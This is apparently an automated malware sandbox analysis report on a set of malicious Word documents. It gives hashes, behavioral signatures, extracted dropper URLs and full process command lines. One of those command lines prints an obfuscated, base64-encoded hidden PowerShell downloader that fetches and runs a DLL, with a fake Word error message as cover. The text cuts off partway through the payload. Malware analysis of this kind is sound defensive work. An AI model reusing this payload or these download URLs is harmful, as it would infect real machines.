Overview
overview
10Static
static
80159.doc
windows7_x64
100159.doc
windows10_x64
1005504-122020.doc
windows7_x64
1005504-122020.doc
windows10_x64
102180_182_7373.doc
windows7_x64
102180_182_7373.doc
windows10_x64
1054909729_2...20.doc
windows7_x64
1054909729_2...20.doc
windows10_x64
1084813.doc
windows7_x64
1084813.doc
windows10_x64
10ARCHIVOFile.doc
windows7_x64
10ARCHIVOFile.doc
windows10_x64
10Archivo-12...53.doc
windows7_x64
10Archivo-12...53.doc
windows10_x64
10DAT_2020.doc
windows7_x64
10DAT_2020.doc
windows10_x64
10DAT_2112.doc
windows7_x64
10DAT_2112.doc
windows10_x64
1Documento-8-92514.doc
windows7_x64
10Documento-8-92514.doc
windows10_x64
10Info_29.doc
windows7_x64
10Info_29.doc
windows10_x64
10MENSAJE.doc
windows7_x64
10MENSAJE.doc
windows10_x64
10T184213_2020.doc
windows7_x64
10T184213_2020.doc
windows10_x64
10Analysis
-
max time kernel
136s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 16:01
Static task
static1
Behavioral task
behavioral1
Sample
0159.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
0159.doc
Resource
win10v20201028
Behavioral task
behavioral3
Sample
05504-122020.doc
Resource
win7v20201028
Behavioral task
behavioral4
Sample
05504-122020.doc
Resource
win10v20201028
Behavioral task
behavioral5
Sample
2180_182_7373.doc
Resource
win7v20201028
Behavioral task
behavioral6
Sample
2180_182_7373.doc
Resource
win10v20201028
Behavioral task
behavioral7
Sample
54909729_21_122020.doc
Resource
win7v20201028
Behavioral task
behavioral8
Sample
54909729_21_122020.doc
Resource
win10v20201028
Behavioral task
behavioral12
Sample
ARCHIVOFile.doc
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Archivo-122020-481-4753.doc
Resource
win7v20201028
Behavioral task
behavioral14
Sample
Archivo-122020-481-4753.doc
Resource
win10v20201028
Behavioral task
behavioral18
Sample
DAT_2112.doc
Resource
win10v20201028
Behavioral task
behavioral19
Sample
Documento-8-92514.doc
Resource
win7v20201028
Behavioral task
behavioral20
Sample
Documento-8-92514.doc
Resource
win10v20201028
Behavioral task
behavioral21
Sample
Info_29.doc
Resource
win7v20201028
Behavioral task
behavioral22
Sample
Info_29.doc
Resource
win10v20201028
Behavioral task
behavioral25
Sample
T184213_2020.doc
Resource
win7v20201028
Behavioral task
behavioral26
Sample
T184213_2020.doc
Resource
win10v20201028
General
-
Target
0159.doc
-
Size
209KB
-
MD5
8e28f73afbc9589c8f3046f45dba8e79
-
SHA1
da94793e6dfb9c7d90227a36009092c881f9a525
-
SHA256
6f4c3417fddd5dd0eea7bb254bbbb7da54dbf9bac497043143c51a0008b2e1cf
-
SHA512
c824c937d8afd0527b1c51ac14036363ddd7e28f096a051d47ecbc0e3e3f068435e1f7ca1ff426e0e04d8e65583816a0e2523694e7171530ebe9b5f7985142be
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://anjumanclick.com/q/kvM/
exe.dropper
https://duocnhanhoa.com/wp-admin/J5JbVEY/
exe.dropper
https://yellomosquito.com/wp-includes/w/
exe.dropper
https://thaithienson.net/wp-admin/EksZXO/
exe.dropper
http://penambahberatbadan.info/r/pXPKwJ/
exe.dropper
https://thienloc.org/data-sgp-kgfig/AaK/
exe.dropper
https://ecomdemo2.ogsdev.net/wp-content/zWWB/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3188 776 cmd.exe -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 23 4304 powershell.exe 26 4304 powershell.exe 45 4304 powershell.exe 47 4304 powershell.exe 49 4304 powershell.exe 51 4304 powershell.exe 53 4304 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4728 WINWORD.EXE 4728 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4304 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4728 WINWORD.EXE 4728 WINWORD.EXE 4728 WINWORD.EXE 4728 WINWORD.EXE 4728 WINWORD.EXE 4728 WINWORD.EXE 4728 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 3188 wrote to memory of 3168 3188 cmd.exe msg.exe PID 3188 wrote to memory of 3168 3188 cmd.exe msg.exe PID 3188 wrote to memory of 4304 3188 cmd.exe powershell.exe PID 3188 wrote to memory of 4304 3188 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEPID:4728"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0159.doc" /o ""Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exePID:3188cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD cwBWACAAIAAoACIAUwAiACsAIgBZADYAbAAiACkAIAAoACAAIABbAHQAWQBwAEUAXQAoACIAewA0AH0AewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAgACcAYwBUAG8AJwAsACcATwAuAEQASQByAGUAJwAsACcARQBtAC4ASQAnACwAJwBSAHkAJwAsACcAUwB5AHMAVAAnACkAIAApACAAOwAgACAAJAA3AFQAMAA2AGEAIAA9AFsAdABZAFAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADgAfQAiACAALQBGACAAJwBzAFkAUwBUAEUAJwAsACcAbgAnACwAJwBQACcALAAnAHQAbQAnACwAJwBPAGkAJwAsACcAQQBOAGEAZwBlACcALAAnAEUAcgBWAGkAQwBlACcALAAnAE0ALgBOAGUAVAAuAHMAJwAsACcAUgAnACkAIAA7ACAAIAAkAEUAcAByAGMAeQByADYAPQAoACcAVwBnACcAKwAoACcAMQAnACsAJwAzADEANwBnACcAKQApADsAJABSAHUAYgA3AGYAXwBxAD0AJABWAHoAOQBsADIAYQBpACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABSAGYAbQB4AG8AcAA0ADsAJABFAGIAegAyAHQAbgA0AD0AKAAoACcATgAnACsAJwA1ADYAJwApACsAKAAnAGwAJwArACcAcQA4ACcAKQArACcAbQAnACkAOwAgACQAUwBZADYAbAA6ADoAIgBDAFIAZQBgAEEAdABgAEUAZABJAHIAYABlAGMAVABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAEsAJwArACgAJwBwACcAKwAnAGYAWAAnACkAKwAnAG8AJwArACgAJwB4AHoAJwArACcAcgAnACkAKwAoACcAZwB5AEsAcABmAFMAJwArACcAMQA1AGwAJwArACcAcwBwACcAKwAnAG8ASwAnACsAJwBwAGYAJwApACkALgAiAHIARQBQAGwAYABBAEMAZQAiACgAKAAnAEsAcAAnACsAJwBmACcAKQAsAFsAcwB0AHIASQBOAGcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAE4AcgByADUAcwBkAGsAPQAoACcARQA4ACcAKwAoACcAbwB0ACcAKwAnAGYAaQBwACcAKQApADsAIAAoAGkAdABFAG0AIAAgACgAIgBWAGEAUgBpAEEAYgAiACsAIgBsACIAKwAiAGUAOgA3AFQAMAA2AEEAIgApACAAKQAuAFYAYQBsAHUARQA6ADoAIgBzAGAAZQBjAHUAUgBpAGAAVABZAHAAYABSAGAATwBUAG8AYwBPAEwAIgAgAD0AIAAoACgAJwBUAGwAcwAnACsAJwAxACcAKQArACcAMgAnACkAOwAkAEoAcgB3AHoAaABxADYAPQAoACcAWABzACcAKwAoACcAMwA4ACcAKwAnAGYAOABlACcAKQApADsAJABUAG0AaABiAG4AaAAxACAAPQAgACgAKAAnAFYAdAAnACsAJwBkACcAKQArACcAOQAnACsAKAAnADkAMAAzAGMAJwArACcAMwAnACkAKQA7ACQATwB3ADAAagBrAGwAcAA9ACgAKAAnAFkAXwAnACsAJwBrACcAKQArACgAJwB5AHcAJwArACcAZAB4ACcAKQApADsAJABYAF8AbABuAGIAagAzAD0AKAAoACcAUwAnACsAJwB4AGUAJwApACsAJwByAHMAJwArACcAcAB6ACcAKQA7ACQASgBqAGYANgB6AG4AMQA9ACQASABPAE0ARQArACgAKAAoACcASABVACcAKwAnAFcAWABvAHgAJwArACcAegAnACsAJwByAGcAeQAnACkAKwAoACcASABVACcAKwAnAFcAJwArACcAUwAxADUAbABzACcAKQArACcAcAAnACsAJwBvACcAKwAoACcASAAnACsAJwBVAFcAJwApACkALQBSAEUAcABMAEEAQwBlACAAKAAnAEgAJwArACcAVQBXACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACsAJABUAG0AaABiAG4AaAAxACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWAAxADcAaQBzAHgAaQA9ACgAJwBNACcAKwAoACcAMQBfAGYAJwArACcAdABmACcAKQArACcAOAAnACkAOwAkAFYAcgBjAGcAdQB5AGoAPQBOAEUAVwBgAC0ATwBgAEIAagBgAEUAYwBUACAAbgBlAFQALgB3AGUAYgBjAGwASQBlAG4AdAA7ACQASgA3AGUAagBwADcAcwA9ACgAKAAnAGgAJwArACgAKAAnAHQAdAAnACsAJwBwADoAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHEAJwArACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACgAJwAoAGEAbgAnACsAJwBqAHUAJwArACcAbQBhAG4AYwAnACkAKQArACgAKAAnAGwAJwArACcAaQBjACcAKwAnAGsALgAnACsAJwBjAG8AbQBxAHEAKQAoAHMAJwApACkAKwAoACgAJwAyACkAJwApACkAKwAnACgAJwArACcAcQAnACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGsAJwApACkAKwAnAHYATQAnACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwArACcAQAAnACkAKQArACcAaAAnACsAKAAnAHQAJwArACcAdABwAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAHEAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABxAHEAKQAoACcAKwAnAHMAMgApACgAJwArACcAZAAnACkAKQArACgAJwB1ACcAKwAnAG8AYwBuAGgAJwApACsAKAAnAGEAbgAnACsAJwBoAG8AJwApACsAKAAoACcAYQAuAGMAbwAnACsAJwBtACcAKwAnAHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKAB3ACcAKQApACsAKAAoACcAcAAnACsAJwAtAGEAJwArACcAZABtAGkAbgBxACcAKwAnAHEAKQAoAHMAMgApACgAJwApACkAKwAnAEoANQAnACsAJwBKACcAKwAoACcAYgBWACcAKwAnAEUAJwApACsAKAAoACcAWQBxAHEAJwArACcAKQAnACsAJwAoAHMAMgAnACkAKQArACcAKQAnACsAJwAoACcAKwAnAEAAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACgAJwBzACcAKwAnADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABxAHEAKQAnACsAJwAoACcAKwAnAHMAMgApACgAeQAnACsAJwBlAGwAbABvAG0AbwBzACcAKQApACsAJwBxACcAKwAnAHUAaQAnACsAJwB0ACcAKwAnAG8ALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAJwBxACcAKwAoACgAJwApACgAcwAyACcAKwAnACkAKAAnACkAKQArACcAdwAnACsAJwBwACcAKwAoACcALQBpAG4AJwArACcAYwBsAHUAZABlAHMAJwArACcAcQBxACcAKQArACgAKAAnACkAJwArACcAKABzACcAKQApACsAKAAoACcAMgApACcAKQApACsAKAAoACcAKAB3AHEAcQAnACsAJwApACcAKwAnACgAJwApACkAKwAoACgAJwBzADIAKQAoACcAKwAnAEAAJwApACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACgAJwBzADoAJwArACcAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABxACcAKwAnAHEAKQAoACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwB0AGgAYQBpAHQAJwApACkAKwAoACcAaAAnACsAJwBpAGUAbgAnACsAJwBzAG8AbgAnACkAKwAoACcALgBuACcAKwAnAGUAdABxACcAKwAnAHEAJwApACsAKAAoACcAKQAnACsAJwAoAHMAJwApACkAKwAoACgAJwAyACkAJwArACcAKAB3AHAALQAnACkAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpACcAKQArACcAbgAnACsAJwBxACcAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKABFAGsAJwArACcAcwAnACsAJwBaAFgAJwApACkAKwAnAE8AcQAnACsAKAAoACcAcQApACcAKQApACsAKAAoACcAKABzADIAKQAnACsAJwAoACcAKQApACsAJwBAACcAKwAoACcAaAAnACsAJwB0AHQAcAAnACkAKwAnADoAcQAnACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAKABxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAcABlACcAKwAnAG4AYQBtACcAKQApACsAKAAnAGIAYQBoACcAKwAnAGIAJwApACsAKAAnAGUAcgBhAHQAYgAnACsAJwBhACcAKwAnAGQAJwApACsAJwBhACcAKwAnAG4AJwArACcALgAnACsAJwBpACcAKwAnAG4AZgAnACsAKAAoACcAbwBxAHEAKQAoAHMAJwArACcAMgApACcAKQApACsAJwAoACcAKwAoACgAJwByAHEAcQAnACsAJwApACgAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAHAAWAAnACsAJwBQAEsAdwBKAHEAcQApACgAcwAyACkAJwApACkAKwAnACgAJwArACgAKAAnAEAAaAB0AHQAcAAnACsAJwBzADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHEAcQApACgAJwArACcAcwAyACkAKAB0ACcAKwAnAGgAJwArACcAaQBlAG4AbABvAGMAJwApACkAKwAoACcALgBvACcAKwAnAHIAJwApACsAKAAoACcAZwBxAHEAJwArACcAKQAoACcAKQApACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAJwBkAGEAdABhAC0AcwAnACsAJwBnAHAALQBrACcAKwAnAGcAZgBpACcAKQArACcAZwAnACsAJwBxACcAKwAnAHEAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBzADIAKQAoAEEAYQAnACkAKQArACcASwAnACsAJwBxACcAKwAoACgAJwBxACkAJwArACcAKABzACcAKQApACsAKAAoACcAMgApACcAKwAnACgAQAAnACkAKQArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAJwApACsAKAAoACcAOgBxACcAKwAnAHEAKQAnACkAKQArACgAKAAnACgAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAoAGUAYwAnACsAJwBvACcAKQApACsAJwBtAGQAJwArACgAJwBlACcAKwAnAG0AbwAyACcAKQArACcALgAnACsAKAAnAG8AJwArACcAZwBzACcAKQArACgAJwBkAGUAJwArACcAdgAnACkAKwAoACcALgBuAGUAJwArACcAdAAnACkAKwAoACgAJwBxAHEAKQAoACcAKwAnAHMAJwApACkAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAHcAcAAtAGMAJwArACcAbwAnACkAKQArACgAJwBuAHQAJwArACcAZQBuAHQAJwApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAKABzACcAKwAnADIAKQAnACkAKQArACgAKAAnACgAegBXACcAKwAnAFcAQgBxACcAKQApACsAKAAoACcAcQApACcAKwAnACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAuACIAUgBFAGAAcABMAEEAYwBFACIAKAAoACgAJwBxAHEAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABJADkAYgA0ADMAbwByACAAKwAgACQAUgB1AGIANwBmAF8AcQAgACsAIAAkAFYAbgB1AHgAaAAwADkAKQA7ACQASAAyADIAOABoAG8AcwA9ACgAJwBUADUAJwArACgAJwA3ACcAKwAnAGwAawB4ACcAKQArACcAZAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEEAdQBxAHAAbAAzADMAIABpAG4AIAAkAEoANwBlAGoAcAA3AHMAIAB8ACAAUwBvAGAAUgBUAGAALQBvAGAAQgBgAGoARQBDAHQAIAB7AEcAZQBUAGAALQByAGAAQQBOAGAARABPAE0AfQApAHsAdAByAHkAewAkAFYAcgBjAGcAdQB5AGoALgAiAEQAbwB3AE4ATABgAE8AYABBAGQARgBJAGwARQAiACgAJABBAHUAcQBwAGwAMwAzACwAIAAkAEoAagBmADYAegBuADEAKQA7ACQAUwBkAGYAdgBuADgAMwA9ACgAKAAnAEcAJwArACcAdQBvAGYAJwApACsAJwBjACcAKwAnAHYAawAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQASgBqAGYANgB6AG4AMQApAC4AIgBMAEUATgBgAGcAdABIACIAIAAtAGcAZQAgADQAMAA1ADIAMgApACAAewAuACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABKAGoAZgA2AHoAbgAxACwAJwAjADEAJwAuACIAVABvAFMAYABUAFIAYABJAE4ARwAiACgAKQA7ACQATAA1ADMAbwBhADQAOAA9ACgAKAAnAFQAYQAnACsAJwA5ACcAKQArACcAcwAnACsAKAAnAGYAJwArACcAYgBoACcAKQApADsAYgByAGUAYQBrADsAJABaADgAZAA0AG0AZwBvAD0AKAAoACcARgAnACsAJwB5AHkAYQAnACkAKwAoACcAbgAnACsAJwBpAGgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAcwA1ADQAbABnADEAPQAoACcARwAnACsAKAAnAGcAdwAnACsAJwA3ADUAJwApACsAJwBhAGQAJwApAA==Process spawned unexpected child processSuspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exePID:3168msg Admin /v Word experienced an error trying to open the file.
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4304POwersheLL -w hidden -ENCOD cwBWACAAIAAoACIAUwAiACsAIgBZADYAbAAiACkAIAAoACAAIABbAHQAWQBwAEUAXQAoACIAewA0AH0AewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAgACcAYwBUAG8AJwAsACcATwAuAEQASQByAGUAJwAsACcARQBtAC4ASQAnACwAJwBSAHkAJwAsACcAUwB5AHMAVAAnACkAIAApACAAOwAgACAAJAA3AFQAMAA2AGEAIAA9AFsAdABZAFAAZQBdACgAIgB7ADAAfQB7ADcAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADgAfQAiACAALQBGACAAJwBzAFkAUwBUAEUAJwAsACcAbgAnACwAJwBQACcALAAnAHQAbQAnACwAJwBPAGkAJwAsACcAQQBOAGEAZwBlACcALAAnAEUAcgBWAGkAQwBlACcALAAnAE0ALgBOAGUAVAAuAHMAJwAsACcAUgAnACkAIAA7ACAAIAAkAEUAcAByAGMAeQByADYAPQAoACcAVwBnACcAKwAoACcAMQAnACsAJwAzADEANwBnACcAKQApADsAJABSAHUAYgA3AGYAXwBxAD0AJABWAHoAOQBsADIAYQBpACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABSAGYAbQB4AG8AcAA0ADsAJABFAGIAegAyAHQAbgA0AD0AKAAoACcATgAnACsAJwA1ADYAJwApACsAKAAnAGwAJwArACcAcQA4ACcAKQArACcAbQAnACkAOwAgACQAUwBZADYAbAA6ADoAIgBDAFIAZQBgAEEAdABgAEUAZABJAHIAYABlAGMAVABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAEsAJwArACgAJwBwACcAKwAnAGYAWAAnACkAKwAnAG8AJwArACgAJwB4AHoAJwArACcAcgAnACkAKwAoACcAZwB5AEsAcABmAFMAJwArACcAMQA1AGwAJwArACcAcwBwACcAKwAnAG8ASwAnACsAJwBwAGYAJwApACkALgAiAHIARQBQAGwAYABBAEMAZQAiACgAKAAnAEsAcAAnACsAJwBmACcAKQAsAFsAcwB0AHIASQBOAGcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAE4AcgByADUAcwBkAGsAPQAoACcARQA4ACcAKwAoACcAbwB0ACcAKwAnAGYAaQBwACcAKQApADsAIAAoAGkAdABFAG0AIAAgACgAIgBWAGEAUgBpAEEAYgAiACsAIgBsACIAKwAiAGUAOgA3AFQAMAA2AEEAIgApACAAKQAuAFYAYQBsAHUARQA6ADoAIgBzAGAAZQBjAHUAUgBpAGAAVABZAHAAYABSAGAATwBUAG8AYwBPAEwAIgAgAD0AIAAoACgAJwBUAGwAcwAnACsAJwAxACcAKQArACcAMgAnACkAOwAkAEoAcgB3AHoAaABxADYAPQAoACcAWABzACcAKwAoACcAMwA4ACcAKwAnAGYAOABlACcAKQApADsAJABUAG0AaABiAG4AaAAxACAAPQAgACgAKAAnAFYAdAAnACsAJwBkACcAKQArACcAOQAnACsAKAAnADkAMAAzAGMAJwArACcAMwAnACkAKQA7ACQATwB3ADAAagBrAGwAcAA9ACgAKAAnAFkAXwAnACsAJwBrACcAKQArACgAJwB5AHcAJwArACcAZAB4ACcAKQApADsAJABYAF8AbABuAGIAagAzAD0AKAAoACcAUwAnACsAJwB4AGUAJwApACsAJwByAHMAJwArACcAcAB6ACcAKQA7ACQASgBqAGYANgB6AG4AMQA9ACQASABPAE0ARQArACgAKAAoACcASABVACcAKwAnAFcAWABvAHgAJwArACcAegAnACsAJwByAGcAeQAnACkAKwAoACcASABVACcAKwAnAFcAJwArACcAUwAxADUAbABzACcAKQArACcAcAAnACsAJwBvACcAKwAoACcASAAnACsAJwBVAFcAJwApACkALQBSAEUAcABMAEEAQwBlACAAKAAnAEgAJwArACcAVQBXACcAKQAsAFsAYwBIAEEAcgBdADkAMgApACsAJABUAG0AaABiAG4AaAAxACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWAAxADcAaQBzAHgAaQA9ACgAJwBNACcAKwAoACcAMQBfAGYAJwArACcAdABmACcAKQArACcAOAAnACkAOwAkAFYAcgBjAGcAdQB5AGoAPQBOAEUAVwBgAC0ATwBgAEIAagBgAEUAYwBUACAAbgBlAFQALgB3AGUAYgBjAGwASQBlAG4AdAA7ACQASgA3AGUAagBwADcAcwA9ACgAKAAnAGgAJwArACgAKAAnAHQAdAAnACsAJwBwADoAcQAnACsAJwBxACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHEAJwArACcAcQApACgAcwAyACcAKwAnACkAJwApACkAKwAoACgAJwAoAGEAbgAnACsAJwBqAHUAJwArACcAbQBhAG4AYwAnACkAKQArACgAKAAnAGwAJwArACcAaQBjACcAKwAnAGsALgAnACsAJwBjAG8AbQBxAHEAKQAoAHMAJwApACkAKwAoACgAJwAyACkAJwApACkAKwAnACgAJwArACcAcQAnACsAKAAoACcAcQBxACkAKABzACcAKwAnADIAKQAnACsAJwAoAGsAJwApACkAKwAnAHYATQAnACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwArACcAQAAnACkAKQArACcAaAAnACsAKAAnAHQAJwArACcAdABwAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAHEAKQAoACcAKQApACsAJwBzADIAJwArACcAKQAnACsAKAAoACcAKABxAHEAKQAoACcAKwAnAHMAMgApACgAJwArACcAZAAnACkAKQArACgAJwB1ACcAKwAnAG8AYwBuAGgAJwApACsAKAAnAGEAbgAnACsAJwBoAG8AJwApACsAKAAoACcAYQAuAGMAbwAnACsAJwBtACcAKwAnAHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKAB3ACcAKQApACsAKAAoACcAcAAnACsAJwAtAGEAJwArACcAZABtAGkAbgBxACcAKwAnAHEAKQAoAHMAMgApACgAJwApACkAKwAnAEoANQAnACsAJwBKACcAKwAoACcAYgBWACcAKwAnAEUAJwApACsAKAAoACcAWQBxAHEAJwArACcAKQAnACsAJwAoAHMAMgAnACkAKQArACcAKQAnACsAJwAoACcAKwAnAEAAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACgAJwBzACcAKwAnADoAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABxAHEAKQAnACsAJwAoACcAKwAnAHMAMgApACgAeQAnACsAJwBlAGwAbABvAG0AbwBzACcAKQApACsAJwBxACcAKwAnAHUAaQAnACsAJwB0ACcAKwAnAG8ALgAnACsAKAAnAGMAbwBtACcAKwAnAHEAJwApACsAJwBxACcAKwAoACgAJwApACgAcwAyACcAKwAnACkAKAAnACkAKQArACcAdwAnACsAJwBwACcAKwAoACcALQBpAG4AJwArACcAYwBsAHUAZABlAHMAJwArACcAcQBxACcAKQArACgAKAAnACkAJwArACcAKABzACcAKQApACsAKAAoACcAMgApACcAKQApACsAKAAoACcAKAB3AHEAcQAnACsAJwApACcAKwAnACgAJwApACkAKwAoACgAJwBzADIAKQAoACcAKwAnAEAAJwApACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACgAJwBzADoAJwArACcAcQAnACkAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKABxACcAKwAnAHEAKQAoACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwB0AGgAYQBpAHQAJwApACkAKwAoACcAaAAnACsAJwBpAGUAbgAnACsAJwBzAG8AbgAnACkAKwAoACcALgBuACcAKwAnAGUAdABxACcAKwAnAHEAJwApACsAKAAoACcAKQAnACsAJwAoAHMAJwApACkAKwAoACgAJwAyACkAJwArACcAKAB3AHAALQAnACkAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpACcAKQArACcAbgAnACsAJwBxACcAKwAoACgAJwBxACkAJwApACkAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwAyACkAKABFAGsAJwArACcAcwAnACsAJwBaAFgAJwApACkAKwAnAE8AcQAnACsAKAAoACcAcQApACcAKQApACsAKAAoACcAKABzADIAKQAnACsAJwAoACcAKQApACsAJwBAACcAKwAoACcAaAAnACsAJwB0AHQAcAAnACkAKwAnADoAcQAnACsAKAAoACcAcQApACgAcwAyACcAKwAnACkAKABxAHEAKQAnACsAJwAoAHMAMgAnACsAJwApACgAcABlACcAKwAnAG4AYQBtACcAKQApACsAKAAnAGIAYQBoACcAKwAnAGIAJwApACsAKAAnAGUAcgBhAHQAYgAnACsAJwBhACcAKwAnAGQAJwApACsAJwBhACcAKwAnAG4AJwArACcALgAnACsAJwBpACcAKwAnAG4AZgAnACsAKAAoACcAbwBxAHEAKQAoAHMAJwArACcAMgApACcAKQApACsAJwAoACcAKwAoACgAJwByAHEAcQAnACsAJwApACgAcwAnACkAKQArACcAMgAnACsAKAAoACcAKQAoACcAKwAnAHAAWAAnACsAJwBQAEsAdwBKAHEAcQApACgAcwAyACkAJwApACkAKwAnACgAJwArACgAKAAnAEAAaAB0AHQAcAAnACsAJwBzADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAHEAcQApACgAJwArACcAcwAyACkAKAB0ACcAKwAnAGgAJwArACcAaQBlAG4AbABvAGMAJwApACkAKwAoACcALgBvACcAKwAnAHIAJwApACsAKAAoACcAZwBxAHEAJwAr